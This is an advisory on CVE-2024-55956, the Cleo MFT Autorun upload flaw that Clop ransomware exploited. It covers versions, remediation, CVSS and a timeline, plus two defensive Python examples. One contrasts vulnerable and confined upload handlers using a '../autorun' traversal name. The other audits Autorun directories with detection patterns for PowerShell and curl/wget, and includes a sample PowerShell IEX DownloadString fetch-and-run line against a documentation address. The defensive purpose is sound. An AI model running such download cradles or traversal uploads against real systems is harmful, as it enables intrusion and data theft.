CVE-2024-55956 — Cleo Multiple Products Unauthenticated File Upload Vulnerability

CVE-2024-55956

Cleo Harmony/VLTrader/LexiCom — Unauthenticated File Upload/Command Execution via Autorun; Clop Ransomware Mass Exploitation

What is Cleo Harmony, VLTrader, and LexiCom?

Cleo Harmony, VLTrader, and LexiCom are managed file transfer (MFT) platforms used by enterprises to automate secure data exchange with trading partners, customers, and internal systems. Like similar MFT platforms (MOVEit, GoAnywhere), Cleo products are internet-facing by design to enable automated file transfers. Cleo is particularly common in retail, manufacturing, logistics, and supply chain industries. Clop ransomware has a pattern of mass-exploiting managed file transfer platforms: MOVEit (June 2023), GoAnywhere (Jan–Feb 2023), and now Cleo (December 2024).

Overview

CVE-2024-55956 is an unauthenticated file upload and command execution vulnerability in Cleo Harmony, VLTrader, and LexiCom. An unauthenticated attacker can upload arbitrary files to the Autorun directory via Cleo's file transfer processing path, then leverage Cleo's Autorun feature to execute bash or PowerShell commands from the uploaded files. Clop ransomware exploited this as a zero-day in December 2024 in a mass data theft campaign targeting dozens of organizations, with data extortion threats following initial access.

Affected Versions

Product          Vulnerable                      Fixed
Cleo Harmony     all versions before 5.8.0.24    5.8.0.24 and later
Cleo VLTrader    all versions before 5.8.0.24    5.8.0.24 and later
Cleo LexiCom     all versions before 5.8.0.24    5.8.0.24 and later

Note: 5.8.0.21 (the build that patched the earlier CVE-2024-50623) was found to be exploitable, and the December 8, 2024 interim patch (5.8.0.22) was bypassed within days; only 5.8.0.24 or later fully addresses the vulnerability. NVD lists every build before 5.8.0.24 as affected.

Technical Details

The vulnerability exploits two Cleo features in combination:

  1. Unauthenticated file upload: Cleo's file transfer processing path lets external parties drop files into designated directories without authentication. This is by design for automated trading-partner transfers, but the path of the written file is not restricted tightly enough, so a file can land outside the intended inbox.
  2. Autorun directory: Cleo's Autorun feature automatically processes files placed in the Autorun directory, executing their contents as bash (Linux) or PowerShell (Windows) commands.

An attacker sends crafted HTTP requests to drop a malicious script file into the Autorun directory. Cleo's background service automatically picks up and executes the file, running the attacker's commands with the privileges of the Cleo service process.

Clop exploitation technique: Attackers used a two-step approach — first uploading a small "dropper" script via the file transfer path, which then downloaded and executed a larger PowerShell payload performing data exfiltration.
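The following is an added example, not Cleo's code, that models the combination described above in miniature: an unauthenticated file-drop handler that joins a client-supplied name onto the inbox path without confinement, placed beside a hardened version that resolves the final path and refuses anything that does not stay inside the inbox. The directory names, function names and the sandbox it builds are assumptions made for illustration; the "autorun" directory here is only a folder whose contents a background service would pick up, and nothing is executed.

```python
"""Added example (not Cleo's code): unconfined vs. confined file-drop handler.

Models the two features the advisory combines: an unauthenticated upload path
that writes where the client says, and an "autorun" directory whose files a
background service would execute. Paths and names are illustrative.
"""
import tempfile
from pathlib import Path


def save_upload_unsafe(inbox: Path, client_name: str, data: bytes) -> Path:
    """Vulnerable pattern: the client-controlled name is joined onto the inbox
    with no confinement, so '../autorun/run.ps1' walks out of the inbox and
    lands in the directory the autorun service executes from."""
    dest = inbox / client_name
    dest.parent.mkdir(parents=True, exist_ok=True)
    dest.write_bytes(data)
    return dest


def save_upload_safe(inbox: Path, client_name: str, data: bytes) -> Path:
    """Hardened pattern: resolve the final path and require its parent to be
    the inbox itself. This rejects absolute paths, '..' segments, symlinked
    escapes and attempts to create subdirectories, before touching disk."""
    inbox_real = inbox.resolve()
    candidate = (inbox_real / client_name).resolve()
    if candidate.parent != inbox_real:
        raise ValueError(f"rejected upload outside inbox: {client_name!r}")
    candidate.write_bytes(data)
    return candidate


def demo() -> dict:
    """Run both handlers against a constructed sandbox and report the outcome.

    Returns whether the unsafe handler let the payload reach the autorun
    directory, whether the hardened handler refused it, and whether the
    hardened handler still accepts an ordinary partner file."""
    root = Path(tempfile.mkdtemp(prefix="mft-demo-"))  # constructed sandbox
    inbox, autorun = root / "inbox", root / "autorun"
    inbox.mkdir()
    autorun.mkdir()
    payload = b"Write-Host 'attacker command'\n"  # constructed, harmless text
    hostile_name = "../autorun/run.ps1"          # traversal into autorun

    landed = save_upload_unsafe(inbox, hostile_name, payload)
    try:
        save_upload_safe(inbox, hostile_name, payload)
        blocked = False
    except ValueError:
        blocked = True
    normal = save_upload_safe(inbox, "invoice-4711.edi", b"UNA:+.? 'UNB+\n")

    return {
        "unsafe_escaped_to_autorun": landed.resolve().parent == autorun.resolve(),
        "safe_blocked_traversal": blocked,
        "safe_accepted_normal": normal.parent == inbox.resolve(),
        "autorun_contents": sorted(p.name for p in autorun.iterdir()),
    }


if __name__ == "__main__":
    print(demo())
```

The check in `save_upload_safe` deliberately compares the resolved parent to the resolved inbox rather than testing a string prefix: a prefix test is fooled by sibling directories such as `inbox-archive`, and resolving both sides first also defeats symlinks planted inside the inbox.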

Discovery

Huntress researchers identified mass exploitation on December 10–11, 2024, triggering rapid industry-wide disclosure. Clop ransomware group claimed responsibility for the campaign on December 16, 2024, posting victim data on their extortion portal.

Exploitation Context

Clop ransomware exploited CVE-2024-55956 in a mass data theft campaign — consistent with their prior Accellion FTA (2021), GoAnywhere (2023), and MOVEit (2023) campaigns. Rather than deploying file-encrypting ransomware, Clop focuses on data theft and extortion: they extract sensitive files, then threaten to publish them on their data leak site unless a ransom is paid.

Huntress identified over 4,200 public-facing Cleo instances in early scanning; dozens were confirmed compromised. Industries targeted include retail, food, trucking, and supply chain companies.

Note: CVE-2024-50623 (October 2024, same products, also exploited by Clop) is the precursor vulnerability in the same product line. CVE-2024-55956 was assigned after systems patched against CVE-2024-50623 were found to be still exploitable.

Remediation

  1. Upgrade to Cleo 5.8.0.24 or later. The December 8 patch (5.8.0.22) was insufficient; only 5.8.0.24 and later are confirmed complete. The CISA deadline was January 7, 2025.
  2. Immediately disable the Autorun feature if it is not operationally required. This removes the execution mechanism even on unpatched systems, but it does not close the unauthenticated file write itself, so it is a stopgap until the upgrade is applied, not a replacement for it.
  3. Restrict Cleo internet exposure — Cleo should only accept connections from known trading partner IP addresses, not from the open internet.
  4. Audit the Autorun directory for unexpected files, particularly scripts dropped between December 3–20, 2024.
  5. Review outbound connections from the Cleo server for data exfiltration indicators — large HTTP/S transfers to unexpected external hosts.
  6. Engage Cleo support for incident response guidance; Clop's data theft operations can proceed quickly after initial access.
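As an added example for steps 1 and 4 (not a Cleo tool or script), the helper below compares an installed version string against the fixed build named in this advisory and walks an Autorun directory, flagging files that are not on an allow-list of known scripts or were modified inside the December 3–20, 2024 window, and noting any bash or PowerShell execution markers it sees. The marker patterns, the allow-list and the sample Autorun directory it builds are assumptions constructed here for illustration, not observed indicators.

```python
"""Added example (not Cleo's code): Autorun directory triage for CVE-2024-55956.

is_vulnerable()  - version check against the fixed build (5.8.0.24).
audit_autorun()  - flags unexpected or recently modified files in an Autorun
                   directory and annotates command-execution markers.
run_demo()       - builds a constructed sample directory and audits it.
"""
import os
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

FIXED_VERSION = (5, 8, 0, 24)  # from the advisory; NVD: "before 5.8.0.24"

# Exploitation window named in the advisory's remediation step 4.
WINDOW = (datetime(2024, 12, 3, tzinfo=timezone.utc),
          datetime(2024, 12, 20, 23, 59, 59, tzinfo=timezone.utc))

# Heuristic markers for bash/PowerShell execution and remote fetches.
# These are assumptions for illustration, not Cleo-specific signatures.
MARKERS = {
    "powershell": re.compile(rb"powershell|Invoke-Expression|\bIEX\b|DownloadString|-EncodedCommand", re.I),
    "bash": re.compile(rb"^#!\s*/bin/(ba)?sh|\bbash\s+-c\b|\b(curl|wget)\s", re.I | re.M),
    "download": re.compile(rb"https?://", re.I),
}


def parse_version(version: str) -> tuple:
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable(version: str) -> bool:
    """True for any build before 5.8.0.24 (tuple comparison, so 5.8.1 > 5.8.0.24)."""
    return parse_version(version) < FIXED_VERSION


def audit_autorun(autorun_dir, known=frozenset(), window=WINDOW) -> list:
    """Return findings for files that are not on the allow-list or whose
    modification time falls inside the exploitation window. Marker hits are
    reported as supporting evidence, not as the sole trigger, because a
    legitimate Autorun script also contains commands."""
    findings = []
    for path in sorted(Path(autorun_dir).iterdir()):
        if not path.is_file():
            continue
        mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
        head = path.read_bytes()[:65536]
        hits = sorted(name for name, rx in MARKERS.items() if rx.search(head))
        reasons = []
        if path.name not in known:
            reasons.append("not on allow-list")
        if window[0] <= mtime <= window[1]:
            reasons.append("modified in exploitation window")
        if reasons:
            if hits:
                reasons.append("command markers: " + ",".join(hits))
            findings.append({"file": path.name, "mtime": mtime.isoformat(), "reasons": reasons})
    return findings


def build_sample(root: Path) -> Path:
    """Constructed sample Autorun directory (not real artifacts). Uses the
    documentation address 198.51.100.7 and harmless command text."""
    autorun = root / "autorun"
    autorun.mkdir()
    samples = {
        "nightly-archive.sh": (b"#!/bin/sh\ntar czf /archive/out.tgz /data/out\n",
                               datetime(2024, 6, 1, tzinfo=timezone.utc)),
        "readme.txt": (b"partner onboarding notes\n",
                       datetime(2024, 3, 3, tzinfo=timezone.utc)),
        "sync-status.txt": (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                            b".DownloadString('http://198.51.100.7/p')\"\n",
                            datetime(2024, 12, 10, 4, 12, tzinfo=timezone.utc)),
    }
    for name, (body, when) in samples.items():
        target = autorun / name
        target.write_bytes(body)
        os.utime(target, (when.timestamp(), when.timestamp()))  # backdate mtime
    return autorun


def run_demo() -> list:
    autorun = build_sample(Path(tempfile.mkdtemp(prefix="cleo-audit-")))
    return audit_autorun(autorun, known={"nightly-archive.sh"})


if __name__ == "__main__":
    print("5.8.0.21 vulnerable:", is_vulnerable("5.8.0.21"))
    for finding in run_demo():
        print(finding)
```

On a real host, point `audit_autorun` at the directory configured as Autorun in the product's options and seed `known` from change control or a pre-December backup; a file that is unknown, modified in the window and carrying markers is the one to pull for analysis first.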

Key Details

Property               Value
CVE ID                 CVE-2024-55956
Vendor / Product       Cleo — Multiple Products (Harmony, VLTrader, LexiCom)
NVD Published          2024-12-13
NVD Last Modified      2025-11-04
CVSS 3.1 Score         9.8
CVSS 3.1 Vector        CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity               CRITICAL
CWE                    CWE-77 (Improper Neutralization of Special Elements used in a Command, 'Command Injection')
CISA KEV Added         2024-12-17
CISA KEV Deadline      2025-01-07
Known Ransomware Use   Yes (Clop)

CVSS 3.1 Breakdown

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Required Action

CISA BOD 22-01 Deadline: 2025-01-07. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date          Event
2024-12-08    Cleo releases interim patch; insufficient, bypass discovered within days
2024-12-11    Mass exploitation confirmed by Huntress; Cleo releases 5.8.0.24
2024-12-13    CVE published
2024-12-16    Clop claims responsibility and begins posting victim data on its extortion portal
2024-12-17    CISA adds to KEV
2025-01-07    CISA BOD 22-01 remediation deadline